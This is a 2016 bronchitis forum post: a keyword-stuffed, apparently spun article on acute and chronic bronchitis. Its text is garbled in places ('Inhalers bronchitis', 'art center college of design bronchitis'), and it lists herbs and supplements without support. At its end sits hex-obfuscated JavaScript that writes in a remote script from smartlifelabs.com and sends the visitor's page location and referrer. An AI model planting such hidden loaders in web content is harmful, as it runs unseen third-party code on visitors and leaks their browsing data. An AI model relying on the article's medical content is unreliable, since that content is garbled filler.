Forum about Bronchitis
Would you like to react to this message? Create an account in a few clicks or log in to continue.
test

HELLO!!!!!!!!!!!!!!!!!!!!

Keywords

Latest topics
» Persistent Cough: Bronchitis: More Than a Cough
Persistent Cough: Bronchitis: More Than a Cough EmptyMon Sep 26, 2016 10:06 am by Admin

» Treat Bronchitis: Herbal Therapy for Bronchitis
Persistent Cough: Bronchitis: More Than a Cough EmptyMon Sep 26, 2016 10:05 am by Admin

» Tamiflu for the Treatment of Influenza
Persistent Cough: Bronchitis: More Than a Cough EmptyMon Sep 26, 2016 10:05 am by Admin

» Bronchitis Breathe
Persistent Cough: Bronchitis: More Than a Cough EmptyMon Sep 26, 2016 10:04 am by Admin

» Bronchitis: Acute Exacerbation of Chronic Bronchitis:
Persistent Cough: Bronchitis: More Than a Cough EmptyMon Sep 26, 2016 10:03 am by Admin

» Chronic Bronchitis Asthma
Persistent Cough: Bronchitis: More Than a Cough EmptyMon Sep 26, 2016 10:02 am by Admin

» Bronchitis: the Respiratory Problem
Persistent Cough: Bronchitis: More Than a Cough EmptyMon Sep 26, 2016 10:01 am by Admin

» Cough Chronic Bronchitis
Persistent Cough: Bronchitis: More Than a Cough EmptyMon Sep 26, 2016 10:01 am by Admin

» Bronchitis
Persistent Cough: Bronchitis: More Than a Cough EmptyMon Sep 26, 2016 10:00 am by Admin

April 2024
MonTueWedThuFriSatSun

Calendar Calendar

Persistent Cough: Bronchitis: More Than a Cough

Go down

Persistent Cough: Bronchitis: More Than a Cough Empty Persistent Cough: Bronchitis: More Than a Cough

Post by Admin Mon Sep 26, 2016 10:06 am

More Than a Cough

Bronchitis is an inflammation of the lining of bronchial tubes, the airways that connect the trachea (windpipe) to the lungs. It is a pulmonary disease and is accompanied by inflammation of the bronchi of the lungs. This infection can be caused by some infection occurring due to micro organisms which is present in the air we breathe or due to cold or flu which can aggravate the bronchial tract and can make it very severe.

Like Many Other Disease It can be Chronic as Well as Acute

If suffering from chronic bronchitis you would be suffering from persistent cough which produces sputum for a continuous three months. The result of an infection caused by the microorganisms leads to the multiplication of the same, causing irritation of your bronchial tract. With such an attack of the bacteria the tubes are swollen and start producing phlegm to fight the irritation in the throat. This is a two-way-sword because by producing phlegm it causes difficulty free breath holding time and body oxygenation suffers from wheezing and a bad cough. Every cloud has a silver lining; so consider that this article on Persistent cough phlegm be the silver lining to the clouds of articles on Persistent Cough. It is this article that will add more spice to the meaning of Persistent Cough.

Acute bronchitis often begins with a dry and irritating cough which is due to the inflammation of the bronchial tubes. Some of the other symptoms are cough which brings up mucus, headache, continuous feeling of tiredness and fever, cold shivers, shortness of breath, tightness at the chest and constant wheezing are to be considered as some of the signs of having bronchitis. Did you ever believe that there was so much to learn about Bronchitis Often? Neither did we! Once we got to write this article, it seemed to be endless.

Usually affects people who are in constant presence of smokers or are chain smokers themselves. The recovery period for cold and flu take much longer time than the other people due to this condition. Having asthma can also art center college of design bronchitis bouts with the shortness of breath, wheezing and other factors. If it gets worse, get it treated by a doctor which is the best thing to do, by which you will get a thorough check up done. We worked as diligently as an owl in producing this composition on Acute Bronchitis. So only if you do read it, and appreciate its contents will we feel our efforts haven't gone in vain.

Seems that Everyone I Know is Sick

Everyone I know has a bad cough. This got me thinking to the last time I had a really bad cough that I could not shake. I just kept taking over the counter drugs, hoping it would get better and it did not. I was having bouts of coughing and breathlessness and had to stop what I was doing so I could recover. Usually this meant if I was jogging or working out, I had to sit down and take a break. And if you are anything like I am, this is a huge thing to do.

Finally went to the Doctor and he explained to me that Inhalers bronchitis. I was wondering how I had gotten bronchitis. And he explained that it was a viral infection that I probably picked up somewhere or from someone. The many pollutants in the air can carry it. There are two types of bronchitis. One is acute and the other is chronic. Acute bronchitis usually lasts for a few weeks, while chronic bronchitis happens frequently for several years. In simplest terms, bronchitis is just an inflammation in your bronchial tubes or the tubes that carry oxygen to your lungs. This article will help you since it is a comprehensive study on Chronic Bronchitis Surprised.

Even if you feel that the symptoms that you are experiencing may not be bronchitis, be sure to see your Doctor as soon as possible, as it may be another infection in your lungs. The coughing and breathlessness is cause for concern. The coughing bouts I would have were very strong and would cause me to have to take a break from what ever I was doing. If I was at work I would have to take a quick time out. It is not any fun when you are not able to breathe. Bronchitis can hamper a lot of your daily activities and the sooner you get it checked out the better. Isn't it wonderful that we can now access information about anything, including Chronic Bronchitis form the Internet without the hassle of going through books and magazines for matter!

• Your symptoms do not clear up, your doctor may prescribe something for you to help open your airway.
  • If you have chronic bronchitis, your Doctor will speak more to you about it and will prescribe some form of treatment for it.
  • Chronic bronchitis can usually be found in smokers.
  • The smoking causes the symptoms to be worse and the treatment for it will probably include quitting smoking.
  • The more you read about Bronchitis, the more you get to understand the meaning of it.
  • So if you read this article and other related articles, you are sure to get the required amount of matter for yourself

For Both Types of Bronchitis, the Major Symptoms Include:

Coughing, Mucus, having shortness of breath, feeling tired, wheezing, having difficulty breathing during physical activity. When doing an assignment on Bronchitis Doctor, it is always better to look up and use matter like the one given here. Your assignment turns out to be more interesting and colorful this way.

Bronchitis is a pulmonary disease caused by the onset of inflammation in the bronchial tubes, which are the air passages into the lungs. In bronchitis these air passages become inflamed and swollen, a thick mucus is generally produced, and is often accompanied by a wheezing cough. Symptoms may also include a difficulty in breathing, the need to constantly cough out mucus, and a mild to moderate fever. There are two forms of bronchitis, acute and chronic, which are somewhat similar and with similar causes, but run their course in different ways. Laughing

Disclaimer: This article is for entertainment purposes only, and is not intended for use as diagnosis or treatment of a health problem or as a substitute for consulting a licensed medical professional. Surprised

Top Row) Location of the Lungs and Airways in the Body. (Second Row

Persistent Cough: Bronchitis: More Than a Cough Asthma-airways-lg598

The Chance for Recovery is Poor for People With Advanced Chronic Bronchitis

Early recognition and treatment, however, can significantly improve the opportunity for a good outcome. Chronic bronchitis also makes you susceptible to recurrent respiratory infections. Call your doctor if you suffer any of these symptoms: coughing up blood; shortness of breath or chest pain; a high fever or shaking chills; a low-grade fever that lasts for three or more days; thick, greenish mucus; or a frequently recurring cough. The completion of this article on Bronchitis Symptoms was our prerogative since the past one month. However, we completed it within a matter of fifteen days!

Chronic bronchitis, also known as chronic obstructive pulmonary disease or COPD, may include fever, nasal congestion, and a hacking cough that can linger for months at a time. As the condition gets worse, the affected person becomes increasingly short of breath, has difficulty with physical exertion, and may require supplemental oxygen. Chemical and biological irritation is believed to be the primary cause of chronic bronchitis, with exposure to cigarette smoke being the main cause. The severity of the disease is often determined by the extent and duration of exposure to tobacco smoke. This can be considered to be a valuable article on Bronchitis Herbs. It is because there is so much to learn about Bronchitis Herbs here. Shocked

Acute bronchitis is characterized by a slight fever that may last for a few days to weeks, and is often accompanied by a cough that may persist for several weeks. Acute bronchitis often occurs after a cold or the flu, as the result of bacterial infection, or from constant irritation of the bronchi by polluted air or chemical fumes in the environment. It may initially affect your nose, sinuses, and throat and then spread to the lungs. For acute bronchitis, symptoms usually resolve within 7 to 10 days, however, a dry, hacking cough can linger for several weeks.

To aid the body in healing, get plenty of rest, good nutrition, and drink at least 8-12 cups of water daily. Using a humidifier may also be helpful. Avoid exposure to tobacco smoke and other air pollutants. Limit consumption of milk, sugar, and white flour. Some vitamins and herbs are considered helpful in treating, or preventing, acute bronchitis. Herbs, and other healing foods, which may be beneficial include: angelica, anise, caraway, cayenne, chickweed, cinnamon, clove, cumin, elecampane, eucalyptus, garlic, ginger, horehound, licorice root, lovage, marjoram, mullein, mugwort, onion, oregano, pineapple, primrose, rosemary, saffron, sage, savory, slippery elm, spicy foods, stinging nettle, and thyme. Supplements which may be helpful include: beta-carotene, B complex, C, calcium & magnesium, E, and zinc. Using great confidence in ourselves, we endeavored to write such a long article on Chronic Bronchitis. Such is the amount of matter found on Chronic Bronchitis.

var c2="bronchitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

Admin
Admin

https://bronch.forumotion.com

Back to top Go down